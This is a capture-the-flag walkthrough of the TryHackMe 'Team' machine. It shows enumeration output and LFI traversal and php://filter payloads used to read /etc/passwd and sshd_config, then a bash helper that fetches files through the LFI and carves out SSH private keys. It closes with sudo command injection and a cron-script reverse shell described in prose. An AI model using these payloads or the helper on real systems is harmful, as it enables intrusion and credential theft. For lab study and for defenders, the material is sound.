Team
https://tryhackme.com/room/teamcw
Enumeration
Port Scan
Run a Port Scan using NMAP
nmap -sV -sC -oA nmap/output <IP_ADDRESS_OF_MACHINE>
We can see that ports 21 (FTP), 22 (SSH) and 80 (HTTP) are open; everything else is filtered
# Nmap 7.80 scan initiated Fri Mar 5 21:49:20 2021 as: nmap -sV -sC -oA nmap/output teamcw
Nmap scan report for teamcw (10.10.87.236)
Host is up (0.055s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 79:5f:11:6a:85:c2:08:24:30:6c:d4:88:74:1b:79:4d (RSA)
| 256 af:7e:3f:7e:b4:86:58:83:f1:f6:a2:54:a6:9b:ba:ad (ECDSA)
|_ 256 26:25:b0:7b:dc:3f:b2:94:37:12:5d:cd:06:98:c7:9f (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 5 21:49:38 2021 -- 1 IP address (1 host up) scanned in 17.39 seconds
- Next I had a quick look at the web page
- Only the Apache2 Ubuntu Default Page was shown, but its title (already visible, truncated, in the nmap output above) hints that something was added to it
- Having a look at the source showed that I have to add 'team.thm' to my hosts file
- After adding a line for team.thm (pointing at the machine's IP) to /etc/hosts, the site's actual landing page appeared instead of the Apache default
- Next I ran gobuster and found the hidden directory /scripts
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://team.thm
- Within this directory there is a file called script.txt (found by running gobuster again against /scripts/ with the .txt extension)
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://team.thm/scripts/ -x .txt
- Browsing to http://team.thm/scripts/script.txt displays the script, and the hint at the very bottom made me try the old backup copy of it: http://team.thm/scripts/script.old
Voilà :)
We now have FTP credentials (left behind in the backup copy of the script) and can use them to log in to the FTP service
- Next I checked out the New_site.txt that was stored on the FTP server:
It seems like we have to add dev.team.thm to the hosts entry for the machine, next to team.thm. Furthermore, the two names within the .txt file look like usernames. Let's take a note of that.
- Browsing to dev.team.thm, the link on the page points to script.php?page=teamshare.php
A file name passed in a page= parameter looks very suspicious: it usually means the script include()s whatever it is given. Let's try:
page=../../../../etc/passwd
Nice :)
- Being able to exploit this directory traversal / LFI vulnerability, we can now try to find the id_rsa that was mentioned in New_site.txt. The SSH daemon's config is a good place to start, this time read through the php://filter wrapper (view-source: keeps the browser from reflowing the file's line breaks):
- view-source:http://dev.team.thm/script.php?page=php://filter/resource=../../../../etc/ssh/sshd_config
- With the private key retrieved this way and saved locally as id_rsa (mode 600, otherwise ssh refuses to use it), we can now connect to the machine as one of the usernames noted from New_site.txt:
ssh -i id_rsa <USERNAME>@<IP_ADDRESS_OF_MACHINE>
and get the user.txt
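The LFI above reads sshd_config through php://filter with no filter applied. The following is an added example, my own helper rather than code from the writeup or the room, that generalizes the technique: it base64-encodes the file before inclusion so that PHP sources (teamshare.php, script.php itself) can be read as text too, and it carves an OpenSSH private key out of whatever file it turned up in. Assumptions: the injection point is script.php?page= as in the writeup, BASE_URL and the usage paths are placeholders, and the key may have been pasted into a config file with each line commented out.

```shell
#!/usr/bin/env bash
# Added example: helper for the page= LFI on dev.team.thm (not the room's code).
# Assumes the injection point script.php?page= from the writeup and a PHP
# target where the php://filter stream wrapper is available.

BASE_URL="${BASE_URL:-http://dev.team.thm/script.php}"

# Build a php://filter URL that base64-encodes the file before include().
# Unlike a raw traversal (page=../../../../etc/passwd) this also works on PHP
# sources such as teamshare.php, which would otherwise be executed, not shown.
build_filter_url() {
    # $1 = base URL, $2 = path on the target
    printf '%s?page=php://filter/convert.base64-encode/resource=%s\n' "$1" "$2"
}

# Fetch one file through the LFI and decode it to stdout (needs the target).
lfi_fetch() {
    curl -s "$(build_filter_url "$BASE_URL" "$1")" | base64 -d
}

# Carve a PEM/OpenSSH private key out of arbitrary text and save it with the
# 0600 mode ssh insists on. A leading '#' and whitespace are stripped from each
# line, which covers a key pasted into a config file as comments (assumption).
extract_private_key() {
    # $1 = input file, $2 = output key file; returns 1 if no key was found
    sed -n '/BEGIN [A-Z ]*PRIVATE KEY/,/END [A-Z ]*PRIVATE KEY/p' "$1" |
        sed 's/^[#[:space:]]*//' > "$2"
    chmod 600 "$2"
    [ -s "$2" ]
}

# Typical run against the box (network, so not exercised offline):
#   lfi_fetch /etc/ssh/sshd_config > sshd_config.txt
#   extract_private_key sshd_config.txt id_rsa && ssh -i id_rsa <USERNAME>@<IP_ADDRESS_OF_MACHINE>
```

If the decoded output is empty, the wrapper is probably being blocked or the path is wrong; fall back to the plain traversal for non-PHP files to confirm the include still works.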
Steps to root.txt
Enumeration
What I almost always do first is sudo -l, to see which commands the current user may run through sudo and as whom
That looks interesting. Let's have a closer look at /home/gyles/admin_checks
The script prompts for a date, and the value entered is executed as a command without any further sanitization, so whatever we type at that prompt runs with the privileges the script runs under.
So, I started the script with the following line:
sudo -u gyles /home/gyles/admin_checks
and entered /bin/bash at the date prompt.
We are now in the context of gyles.
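To make the admin_checks bug concrete, here is an added example, my own reconstruction of the pattern the writeup describes and not the room's script (whose contents were only in the screenshot): the vulnerable prompt beside a hardened version. The prompt text and function names are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not the room's admin_checks script: the vulnerable function
# reproduces the pattern described in the writeup, the hardened one fixes it.

# VULNERABLE: the value read from the user is placed in command position, so
# the shell word-splits and executes it. Answering the prompt with /bin/bash
# spawns a shell with the script's privileges (gyles via sudo in the writeup).
# Quoting ("$answer") would not help; the variable must never be a command.
vulnerable_date_check() {
    printf 'Enter date: ' >&2
    read -r answer
    $answer 2>/dev/null
}

# HARDENED: accept only YYYY-MM-DD, then use the value as data for date(1),
# never as a command. Anything else is rejected with exit status 1.
safe_date_check() {
    printf 'Enter date: ' >&2
    read -r answer
    case "$answer" in
        [0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]) ;;
        *) printf 'rejected: %s\n' "$answer" >&2; return 1 ;;
    esac
    date -d "$answer" +%A   # GNU date: prints the weekday for the given date
}
```

The allowlist is the important part: a blocklist of shell metacharacters would still let "/bin/bash" through, since that string contains none.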
Gyles is a member of the admin group. Let’s take a note of that.
I continued my search for possible privilege escalation vectors using linpeas.sh (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS).
linpeas pointed me at something interesting: inside the /opt/admin_stuff/ directory I found script.sh
Interesting. So /usr/local/bin/main_backup.sh is executed every minute.
Let's find out what it does:
It basically just copies the content of one directory into another.
Checking out the destination directory showed me that the copied files are owned by root, so the cron job performing the task runs as root.
And the good thing about it is, being a member of the admin group gives us write access to /usr/local/bin/main_backup.sh, so we control what root executes every minute
So all that's left to do is
- starting a netcat listener
- appending a reverse shell to main_backup.sh
- waiting at most one minute for the cron job to fire
- and of course getting root.txt :)